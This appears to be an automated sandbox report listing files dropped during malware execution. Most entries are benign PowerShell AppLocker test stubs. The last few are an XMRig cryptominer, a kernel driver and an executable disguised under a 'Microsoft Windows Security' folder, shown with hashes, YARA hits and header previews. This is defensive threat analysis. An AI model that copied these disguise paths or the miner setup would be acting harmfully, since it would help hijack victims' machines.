                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5xrglguq.euj.psm1

                                                                                                                                                                                                    Download File
                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_atmyihj1.4kz.psm1

                                                                                                                                                                                                    Download File
                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_au04gmkt.xfz.psm1

                                                                                                                                                                                                    Download File
                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cciqgpxe.5gk.psm1

                                                                                                                                                                                                    Download File
                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cg3cn0q3.kvs.ps1

                                                                                                                                                                                                    Download File
                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dngmtvlm.xdq.psm1

                                                                                                                                                                                                    Download File
                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_e5eiy2yb.lui.psm1

                                                                                                                                                                                                    Download File
                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ehqiestd.4zy.ps1

                                                                                                                                                                                                    Download File
                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_emvog3gr.zdd.ps1

                                                                                                                                                                                                    Download File
                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_eotr4mrw.tzh.psm1

                                                                                                                                                                                                    Download File
                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_izpjwpkt.phw.psm1

                                                                                                                                                                                                    Download File
                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_oaw40m54.qnu.ps1

                                                                                                                                                                                                    Download File
                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ox0yghyy.krn.ps1

                                                                                                                                                                                                    Download File
                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_t02w1jsi.wsp.ps1

                                                                                                                                                                                                    Download File
                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tekviu5v.iod.psm1

                                                                                                                                                                                                    Download File
                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uf1fpcmy.w44.psm1

                                                                                                                                                                                                    Download File
                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ulen12qk.qzk.ps1

                                                                                                                                                                                                    Download File
                                                                                                                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vlcaedjg.vnr.ps1

                                                                                                                                                                                                    Download File
                                                                                                                                                                                                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):60
                                                                                                                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\jacrzswcvuml.tmp

                                                                                                                                                                                                    Download File
                                                                                                                                                                                                    Process:C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe
                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):5536256
                                                                                                                                                                                                    Entropy (8bit):6.689058470432344
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:98304:VJuCqT8q5Jt3eM2UIDLeIY3I7LMHrPZF6OhgIDxDjP5ysRAwRCVYFufw6:zulp5JtBF6Oh3DxxysRFkRw6
                                                                                                                                                                                                    MD5:8FA2F1BA9B9A7EA2B3C4DD627C627CEC
                                                                                                                                                                                                    SHA1:358E3800286E5D4C5662366AD7311BC5A51BA497
                                                                                                                                                                                                    SHA-256:78A452A6E1A3951DC367F57ACE90711202C824B68835C5DB86814F5B41486947
                                                                                                                                                                                                    SHA-512:74EDD438B806E086A3FACBE8FB98E235068C0D3F8572C6A3A937649CA0E9A6BCB9F0B42E5562E1CBE3576B011AB83730FC622B1496CC448DD3C296284671E775
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Yara Hits:
                                                                                                                                                                                                    • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: C:\Users\user\AppData\Local\Temp\jacrzswcvuml.tmp, Author: Joe Security
                                                                                                                                                                                                    • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: C:\Users\user\AppData\Local\Temp\jacrzswcvuml.tmp, Author: unknown
                                                                                                                                                                                                    • Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: C:\Users\user\AppData\Local\Temp\jacrzswcvuml.tmp, Author: Florian Roth
                                                                                                                                                                                                    • Rule: MALWARE_Win_CoinMiner02, Description: Detects coinmining malware, Source: C:\Users\user\AppData\Local\Temp\jacrzswcvuml.tmp, Author: ditekSHen
                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 70%
                                                                                                                                                                                                    Preview:MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$................................................................i..............C..Q....i.....i.....i........}....i.....Rich...........PE..d.....(d..........".......9...D.......6........@..............................~...........`.................................................|.P......P~.......{..............`~......AM......................BM.(... AM.8.............9..............................text...^.9.......9................. ..`.rdata........9.......9.............@..@.data.....+...P.......P.............@....pdata........{.......Q.............@..@_RANDOMXV.....}.......S.............@..`_TEXT_CN.&....}..(....S.............@..`_TEXT_CN..... ~.......S.............@..`_RDATA.......@~.......S.............@..@.rsrc........P~.......S.............@..@.reloc.......`~.......S.............@..B........................................

                                                                                                                                                                                                    C:\Users\user\AppData\Roaming\Google\Libs\WR64.sys

                                                                                                                                                                                                    Download File
                                                                                                                                                                                                    Process:C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe
                                                                                                                                                                                                    File Type:PE32+ executable (native) x86-64, for MS Windows
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):14544
                                                                                                                                                                                                    Entropy (8bit):6.2660301556221185
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:192:nqjKhp+GQvzj3i+5T9oGYJh1wAoxhSF6OOoe068jSJUbueq1H2PIP0:qjKL+v/y+5TWGYOf2OJ06dUb+pQ
                                                                                                                                                                                                    MD5:0C0195C48B6B8582FA6F6373032118DA
                                                                                                                                                                                                    SHA1:D25340AE8E92A6D29F599FEF426A2BC1B5217299
                                                                                                                                                                                                    SHA-256:11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
                                                                                                                                                                                                    SHA-512:AB28E99659F219FEC553155A0810DE90F0C5B07DC9B66BDA86D7686499FB0EC5FDDEB7CD7A3C5B77DCCB5E865F2715C2D81F4D40DF4431C92AC7860C7E01720D
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 5%
                                                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5:n.q[..q[..q[..q[..}[..V.{.t[..V.}.p[..V.m.r[..V.q.p[..V.|.p[..V.x.p[..Richq[..................PE..d....&.H.........."..................P.......................................p..............................................................dP..<....`.......@..`...................p ............................................... ..p............................text............................... ..h.rdata..|.... ......................@..H.data........0......................@....pdata..`....@......................@..HINIT...."....P...................... ....rsrc........`......................@..B................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                    C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe

                                                                                                                                                                                                    Download File
                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1428024550.exe
                                                                                                                                                                                                    File Type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                    Size (bytes):5827584
                                                                                                                                                                                                    Entropy (8bit):7.718261688436852
                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                    SSDEEP:98304:ZMknXV8IFUX81qQ6lLYhJ/N0TB4HBDxWcLKamiwPZhsSZLZ1wpxGN:ZBnXV86UiqrlLY/8AW6YZPZf6HGN
                                                                                                                                                                                                    MD5:13B26B2C7048A92D6A843C1302618FAD
                                                                                                                                                                                                    SHA1:89C2DFC01AC12EF2704C7669844EC69F1700C1CA
                                                                                                                                                                                                    SHA-256:1753AD35ECE25AB9A19048C70062E9170F495E313D7355EBBBA59C38F5D90256
                                                                                                                                                                                                    SHA-512:D6AFF89B61C9945002A6798617AD304612460A607EF1CFBDCB32F8932CA648BCEE1D5F2E0321BB4C58C1F4642B1E0ECECC1EB82450FDEC7DFF69B5389F195455
                                                                                                                                                                                                    Malicious:true
                                                                                                                                                                                                    Antivirus:
                                                                                                                                                                                                    • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 76%
